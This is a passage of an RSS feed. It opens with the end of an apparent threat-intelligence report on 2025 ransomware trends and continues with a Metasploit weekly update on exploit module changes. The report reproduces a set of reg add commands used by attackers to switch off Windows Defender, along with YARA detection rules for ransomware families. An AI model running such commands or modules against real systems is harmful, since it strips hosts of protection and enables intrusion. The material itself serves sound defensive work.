<p role="presentation"><span>In some cases, threat actors used benign names in their operations in an attempt to masquerade as legitimate software or system resources. For example, in a RIFTTEAR incident, threat actors registered a scheduled task named "\Microsoft\Update" to execute a malicious command likely intended to kill endpoint detection and response (EDR) processes. In a separate case involving CONTI, the ransomware binary had its filename renamed from "enc_lin" to "rsync" in an attempt to appear as the native synchronization command-line utility.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often disabled or deleted backups to inhibit and/or limit recovery options. In some cases, threat actors stopped backup servers and/or deleted Volume Shadow Copies (VSS) via PowerShell scripts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Notably, in a RANSOMHUB incident, the threat actors used the access to Cisco Integrated Management Controller (CIMC) to map a Debian Linux ISO image via Virtual Media across a nine-node Cohesity cluster. By modifying the boot priority and hardware power-cycling, the nodes booted into the external Linux environment, overwriting the Cohesity operating system (OS) and rendering the backup data inaccessible.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a handful of intrusions, the threat actors used tooling to terminate processes and services associated with security software solutions, specifically those abusing signed kernel mode drivers. Examples include the open-source TERMINATOR and WATCHDOGKILLER, as well as non-publicly available tools such as WARCLAW, a utility that decodes and installs a vulnerable kernel mode driver.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1"

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f</code></pre>
<p><span>Figure 14: Windows Defender registry key modification</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Tool Prevalence</span></h4>
<p><span>Throughout 2025, we continued to see ransomware actors rely heavily on publicly available tools and legitimate software across various stages of ransomware intrusions. While legitimate software remains popular, we observed a slight decrease in the use of RMM tools and post-exploitation C2 frameworks. Notably, both WinRAR and Rclone were observed in almost one-fourth of incidents, likely corresponding with the increase in incidents involving data theft, given that these tools are regularly used to stage and exfiltrate data respectively.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors used post-exploitation C2 frameworks in about 15% of 2025 ransomware incidents, a decrease from almost 20% in 2024. The decline in the use of post-exploitation frameworks is largely due to the continued reduction in use of Cobalt Strike BEACON.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Cobalt Strike BEACON was deployed in only 2% of 2025 ransomware incidents, continuing a multi-year downward trend; in 2021 roughly 60% of ransomware incidents involved BEACON, dropping to around 38% in 2022, 20% in 2023, and 11% in 2024. This decrease could in part be attributed to some subset of actors exploring new frameworks, like AdaptixC2.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed approximately 8% of intrusions involving the AdaptixC2 (ADAPTAGENT) post-exploitation framework. </span><a href="https://unit42.paloaltonetworks.com/adaptixc2-post-exploitation-framework/" rel="noopener" target="_blank"><span>AdaptixC2</span></a><span> is an open-source post-exploitation framework developed for penetration testers; however, similar to the use of CobaltStrike for many years, threat actors often abuse these types of pentesting tools to facilitate their operations.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Less frequently, we observed the penetration frameworks associated with MYTHICAGENT, METASPLOIT, HAVOC, and EXPLORATIONC2.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Extending a trend identified last year, threat actors appear slightly less reliant on remote management tools. Around 24% of 2025 incidents involved at least one RMM, compared to 28% in 2024, and 40% in 2023.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed 10 unique remote management tools in ransomware incidents in 2025 comparable to nine in 2024, but an overall decrease from 13 in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also saw a decrease in instances of threat actors leveraging multiple different RMMs within the same intrusion. In 2025, multiple RMMs were only observed in ~5% of incidents, compared to 8% in 2024, and 16% in 2023.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Consistent with recent years, AnyDesk remained the most commonly deployed RMM in ransomware incidents in 2025; however, overall use decreased from roughly 31% in 2023 and 16% in 2024 to 10% in 2025.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors' use of tunnelers remained fairly consistent as compared to 2024; however, there were small shifts in the use of specific tunnelers. For example, CLOUDFLARED was observed in 8% of incidents in 2025 compared to around 4% in 2024.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We've observed a negligible decline in the use of SYSTEMBC, with around 14% of incidents involving the tunneler in 2023, a little over 7% in 2024, and down to a little over 6% in 2025. Notably, Operation Endgame </span><a href="https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem" rel="noopener" target="_blank"><span>disrupted</span></a><span> SYSTEMBC infrastructure in May 2024; while the malware is still being sold on forums, it's plausible that the law enforcement disruption dissuaded some threat actors from continuing to use the malware in their operations.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025, threat actors continued to leverage common publicly available network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner in around 50% of intrusions, consistent with the 2024 rate.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In 2025, we observed an increase in the use of public tools like WinRAR and Rclone that are often used by threat actors to facilitate data theft, which aligns with our overall increase in incidents involving suspected or confirmed data theft from 2024 to 2025. Both WinRAR and Rclone were observed in approximately 23% of incidents; in 2024, we observed around 16% of intrusions involving Rclone and only around 8% involving WinRAR.</span></p>
</li>
</ul>
<h3><span>Remediation and Hardening</span></h3>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a><span>. </span></p>
<h3><span>Outlook and Implications</span></h3>
<p><span>Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations. This is likely due to increased difficulty in successful deployments due to victims' improved security postures, a greater refusal to pay ransom demands, and enhanced recovery capabilities. In the coming years, evolving regulations, including reporting requirements and payment bans, may further dissuade some companies from making ransom payments. While we anticipate ransomware to remain one of the most dominant threats globally, the reduction in profits may cause some threat actors to seek other monetization methods. This could manifest as increased data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms such as using compromised infrastructure to send phishing messages.</span></p>
<h3><span>Detections</span></h3>
<h4><span>YARA Rules</span></h4>
<h5><span><span>AGENDA</span></span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_AGENDA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$conf1 = "public_rsa_pem" fullword
		$conf2 = "private_rsa_pem" fullword
		$conf3 = "directory_black_list" fullword
		$conf4 = "file_black_list" fullword
		$conf5 = "file_pattern_black_list" fullword
		$conf6 = "process_black_list" fullword
		$conf7 = "win_services_black_list" fullword
		$conf8 = "company_id" fullword
		$conf9 = "note" fullword
		$load_const1 = { 21 B7 F6 F7 }
		$load_const2 = { F6 36 A4 69 }
		$load_s1 = "run_portable_executable" fullword
		$load_s2 = "MemoryLoadLibrary" fullword
		$load_s3 = "_ZN9morph_poc4main"
		$note1 = "Extension: "
		$note2 = "Domain: "
		$note3 = "login: "
		$note4 = "password: "
		$note5 = "Enter credentials-- Credentials"
		$note6 = "-- Qilin"
		$note7 = "-- Recovery"
		$note8 = "www.torproject.org"
		$note9 = ".onion"
		$note10 = "Employees personal data, CVs, DL , SSN."
		$note11 = "%s/%s_RECOVER.txt"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (7 of ($conf*) or 7 of ($note*) or all of ($load*))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>AGENDA.RUST</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Win_Ransomware_AGENDA_RUST_2_MBeta {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$rust = "/rust/"
		$conf1 = "\"public_rsa_pem\":"
		$conf2 = "\"private_rsa_pem\":"
		$conf3 = "\"directory_black_list\":"
		$conf4 = "\"file_black_list\":"
		$conf5 = "\"file_pattern_black_list\":"
		$conf6 = "\"process_black_list\":"
		$conf7 = "\"win_services_black_list\":"
		$conf8 = "\"company_id\":"
		$conf9 = "\"n\":"
		$conf10 = "\"p\":"
		$conf11 = "\"fast\":"
		$conf12 = "\"skip\":"
		$conf13 = "\"step\":"
		$conf14 = "\"accounts\":"
		$conf15 = "\"note\":"
	condition:
		uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize &lt; 5MB and (($rust and 8 of ($conf*)) or (13 of ($conf*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>REDBIKE</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_REDBIKE_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a1 = ".akira"
		$a2 = "akira_readme.txt"
		$a3 = "akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id"
		$s1 = "--encryption_percent" ascii wide nocase
		$s2 = "--encryption_path" ascii wide nocase
		$s3 = "--share_file" ascii wide nocase
	condition:
		((all of ($s*)) and (any of ($a*))) and (uint16(0) == 0x5A4D) and filesize &gt; 500KB and filesize &lt; 2MB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>REDBIKE.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APTFIN_Ransom_REDBIKE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a = "akira_readme.txt"
		$b = "save your TIME, MONEY, EFFORTS"
		$c = "akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion"
		$d = "--encryption_percent"
		$e = "--encryption_path"
		$f = "--share_file"
	condition:
		all of them and (uint32be(0) == 0x7F454C46)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_CLOP_rol7XorHash32_ConfigHashes_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$hex_asm_literal_a = { 92 F7 53 7A }
		$hex_asm_literal_b = { 43 29 79 71 }
		$hex_asm_literal_c = { 2A 81 C4 E2 }
		$hex_asm_literal_d = { 2E F4 FA 7E }
		$hex_asm_literal_e = { 31 E5 7F 91 }
		$hex_asm_literal_f = { 16 24 45 D6 }
		$hex_asm_literal_g = { 56 22 93 EA }
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>CLOP.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_CLOP_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str_jobmessage_a = "Successfully started daemon-name"
		$str_jobmessage_b = "Could not change working directory to /"
		$str_jobmessage_c = "Could not generate session ID for child process"
		$asm_code_fileordirectory = { 25 00 F0 00 00 3D 00 40 00 00 75 }
		$asm_functioncall_open64_readfile = { 80 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 02 00 00 00 }
		$asm_functioncall_open64_writebytes = { B4 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 42 00 00 00 }
		$asm_encryption_filebuffersize = { 00 E1 F5 05 76 ?? C7 45 ?? 00 E1 F5 05 }
		$asm_encryption_generatekey = { 1F 89 ( C? | D? | E? | F? ) C1 ( C? | D? | E? | F? ) 18 8D ( 0? | 1? ) ( 0? | 1? ) 25 FF 00 [0-2] 29 ( C? | D? | E? | F? ) 83 ( C? | D? | E? | F? ) 01 C9 }
	condition:
		uint32(0) == 0x464C457F and all of ($str_*) or (#asm_code_fileordirectory == 2 and #asm_functioncall_open64_writebytes == 2 and ($asm_encryption_generatekey and $asm_functioncall_open64_readfile and $asm_encryption_filebuffersize))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>PLAYCRYPT</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransomware_PLAYCRYPT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2022-12-21"
		date_modified = "2022-12-21"
		rev = "1"
	strings:
		$c1 = { 8A CB 0F B6 D0 8B F2 8B FA D3 EE 8D 4B 01 D3 EF 83 E6 01 83 E7 01 }
		$c2 = { 8D 45 F0 C7 85 D0 FD FF FF 00 00 00 00 50 83 EC 08 }
		$c3 = { 8B 14 0A 8B 4C 32 20 03 D6 89 55 E0 03 CE }
		$c4 = { 8D 8D 80 ?? FF FF E8 C8 ?? FF FF 85 C0 75 61 83 BD [2] FF FF 05 76 58 }
		$c5 = { FF 76 ?? C6 45 EE 00 E8 [2] 00 00 8B F0 8B CF 33 C0 85 F6 0F 48 F0 E8 }
		$c6 = { FF D0 8B F8 83 FF 05 0F [2] 01 00 00 83 FF 06 0F [2] 01 00 00 8B 0E 3B 4E 04 0F [2] 01 00 00 83 FF 04 74 6D 83 FF 01 }
		$s1 = "OpaqueKeyBlob" wide
		$s2 = "AppPolicyGetProcessTerminationMethod"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize &gt; 100KB and filesize &lt; 200KB and ((2 of ($c*) and all of ($s*)) or (4 of ($c*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>PLAYCRYPT.LINUX</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_PLAYCRYPT_LINUX_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "First step is done."
		$s2 = "/dev/urandom"
		$s3 = "esxcli storage filesystem list &gt; storage"
		$s4 = "hosts in exclusion:"
		$s5 = "encrypt: "
		$s6 = ".PLAY" fullword
	condition:
		uint32(0) == 0x464C457F and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>SAFEPAY</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe"

rule G_Ransom_SAFEPAY_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$hex_asm_snippet = { 10 27 00 00 [0-4] 10 27 00 00 }
	condition:
		pe.imphash() == "ff67c703589f775db9aed5a03e4489b0" and ($hex_asm_snippet)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_SAFEPAY_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$code_string_decode = { 8A C2 32 C1 32 44 0D ?? 34 ?? 88 44 0D ?? 41 83 F9 04 [4-64] B? 4D 5A 00 00 }
		$code_hardware_aes_check = { 0F A2 8B F3 5B 89 07 89 77 ?? 89 4F ?? 89 57 [0-12] ( 00 00 00 02 | C1 ?? 19 ) }
		$code_encrypt_file = { 14 00 10 00 [2-24] 14 00 10 00 [2-32] 00 10 00 5? [0-8] FF ( 15 | D? ) }
		$enc_str1 = { C7 45 ?? 67 4B 3D 49 C7 45 ?? 2F 4F 2F 4D }
		$enc_str2 = { C7 45 ?? 10 3C 51 3E C7 45 ?? 5C 38 4F 3A C7 45 ?? 42 34 58 36 C7 45 ?? 43 30 58 32 66 C7 45 ?? 2D 2C }
		$enc_str3 = { C7 45 ?? A3 8F FF 8D C7 45 ?? EF 8B E4 89 C7 45 ?? E0 87 E0 85 C7 45 ?? E7 83 EC 81 C7 45 ?? FB 9F E8 9D C7 45 ?? FF 9B 98 99 }
		$enc_str4 = { C7 45 ?? 44 40 51 47 C7 45 ?? 51 49 10 10 C7 45 ?? 03 48 43 42 C6 45 ?? 29 }
		$enc_str5 = { C7 45 ?? 77 77 73 74 C7 45 ?? 75 6D 64 70 C7 45 ?? 23 68 63 62 C6 45 ?? 09 }
	condition:
		uint16(0) == 0x5a4d and (all of ($code*) or (any of ($code*) and any of ($enc*)) or (2 of ($enc*)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d" wide
		$s2 = "[-] Failed" wide
		$s3 = "[+] Start" wide
		$s4 = "INC-README" wide
		$s5 = "--debug" wide
		$s6 = "RECYCLE" wide
	condition:
		all of them and (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Lynx Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$lynx = "lynx" ascii wide nocase
	condition:
		$lynx and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 300KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5><span>INC (Sinobi Branded)</span></h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_INC_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$sin = "sinobi" ascii wide nocase
	condition:
		$sin and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize &lt; 400KB and filesize &gt; 50KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>INC.LINUX</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d"
		$s2 = "[-] Failed"
		$s3 = "[+] Start"
		$s4 = "INC-README"
		$s5 = "--debug"
		$s6 = "vmsvc"
	condition:
		all of them and uint32(0) == 0x464c457f
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>RANSOMHUB</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Ransom_RANSOMHUB_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "json:\"settings\""
		$str2 = "json:\"extension\""
		$str3 = "json:\"net_spread\""
		$str4 = "json:\"local_disks\""
		$str5 = "json:\"running_one\""
		$str6 = "json:\"self_delete\""
		$str7 = "json:\"white_files\""
		$str8 = "json:\"white_hosts\""
		$str9 = "json:\"credentials\""
		$str10 = "json:\"kill_services\""
		$str11 = "json:\"set_wallpaper\""
		$str12 = "json:\"white_folders\""
		$str13 = "json:\"note_file_name\""
		$str14 = "json:\"note_full_text\""
		$str15 = "json:\"kill_processes\""
		$str16 = "json:\"network_shares\""
		$str17 = "json:\"note_short_text\""
		$str18 = "json:\"master_public_key\""
	condition:
		14 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FURYSTORM</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Whitelist VM id"
		$s2 = "gwfn6l3bk45o2zecvi7xtyqrpsudmahj"
		$s3 = "Dry-run"
		$s4 = "-paths"
		$s5 = "-vmsvc"
		$s6 = "Note: motd=%d login=%d clean=%d"
		$s7 = "Cryptor args"
		$s8 = "VMX found"
		$s9 = "Keys: %016l"
		$s10 = "vim-cmd"
		$s11 = "Dropping readme"
		$s12 = "Encryption params"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 700KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Ransom_FURYSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Failed decrypt file:"
		$s2 = "Decryptor args:"
		$s3 = "Private key loaded"
		$s4 = "Keys: %016l"
		$s5 = "Dry-run"
		$s6 = "Encryption params"
		$s7 = "Whitelist paths"
		$s8 = "Note: motd=%d"
	condition:
		uint32(0) == 0x464c457f and filesize &gt; 50KB and filesize &lt; 300KB and 6 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h5>FIREFLAME</h5></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Autopatt_Ransom_FIREFLAME_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$p00_0 = { 8B CE 8D 5F ?? 8A 01 8D 49 ?? 0F B6 C0 83 E8 ?? 8D 04 40 C1 E0 ?? 99 }
		$p00_1 = { 55 8B EC FF 75 ?? E8 [4] 59 8B 4D ?? 89 01 F7 D8 1B C0 }
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (0 .. 380000) and $p00_1 in (260000 .. 280000)))
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Dima Lenz, Chastine Altares, Ana Foreman, and the Advanced Practices, Mandiant Consulting, and FLARE teams. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 05/08/2026]]></title>
<description><![CDATA[Spring cleanupThis week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capabil...]]></description>
<link>https://tsecurity.de/de/3500189/it-security-nachrichten/metasploit-wrap-up-05082026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500189/it-security-nachrichten/metasploit-wrap-up-05082026/</guid>
<pubDate>Fri, 08 May 2026 20:57:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Spring cleanup</h1><p>This week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux. Additionally, the exploit/multi/http/shiro_rememberme_v124_deserialize module has been improved to allow operators to adjust the deserialization chain, enabling exploitation of a broader set of targets. Finally, several critical utility modules, including the FTP anonymous scanner and other FTP modules, received general fixes and updates.</p><h2>New module content (1)</h2><h3>Anonymous FTP Access Detection</h3><p>Authors: Matteo Cantoni <a href="mailto:goony@nothink.org">goony@nothink.org</a> and g0tmi1k</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21372">#21372</a> contributed by <a href="https://github.com/g0tmi1k">g0tmi1k</a></p><p>Path: scanner/ftp/ftp_anonymous</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-1999-0497&amp;referrer=blog">CVE-1999-0497</a></p><p>Description: This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.</p><h2>Enhanced Modules (2)</h2><p>Modules which have either been enhanced, or renamed:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21410">#21410</a> from <a href="https://github.com/inkognitobo">inkognitobo</a> - This improves the exploit/multi/http/shiro_rememberme_v124_deserialize module by adding a JAVA_GADGET_CHAIN datastore option that allows the operator to adjust the chain used for deserialization. This enables the module to exploit additional targets.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21404">#21404</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This extends the support of Copy Fail to ARMLE Linux targets.</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21342">#21342</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Defers the loading of some dependencies to improve console boot time.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21372">#21372</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21380">#21380</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Updates multiple FTP modules to now register FTP service information in the database when successfully connecting to an FTP service.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21418">#21418</a> from <a href="https://github.com/kx7m2qd">kx7m2qd</a> - This improves the platform-agnostic library used to obtain the OS architecture with support for shell sessions on Linux, BSD and Mac OSX.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21314">#21314</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Fixes a crash when running the scanner/http/trace module with the database enabled and a vulnerability was reported.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21411">#21411</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This fixes a bug in the linux/x64/exec payload that was caused by the CMD datastore option being placed in the assembly source without being escaped.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21413">#21413</a> from <a href="https://github.com/tart0ru5">tart0ru5</a> - Fixes a logic error in the exploits/linux/http/projectsend_unauth_rce module that incorrectly checked if a new user has been created.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21421">#21421</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - This adds extra validation to report_vuln and delete_vuln in Msf::DBManager::Vuln to make sure required fields are present and avoid a crash.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21425">#21425</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Fixes a bug when parsing FTP server responses.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-30T22%3A30%3A05Z..2026-05-08T17%3A05%3A58%2B01%3A00%22">Pull Requests 6.4.131...6.4.132</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.131...6.4.132">Full diff 6.4.131...6.4.132</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honda: Kupplung für Elektromotorräder soll Motocross-Feeling erzeugen - Golem.de]]></title>
<description><![CDATA[... Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning Kurse im Paket) · zum ...]]></description>
<link>https://tsecurity.de/de/3496980/hacking/honda-kupplung-fuer-elektromotorraeder-soll-motocross-feeling-erzeugen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496980/hacking/honda-kupplung-fuer-elektromotorraeder-soll-motocross-feeling-erzeugen-golemde/</guid>
<pubDate>Thu, 07 May 2026 19:55:31 +0200</pubDate>
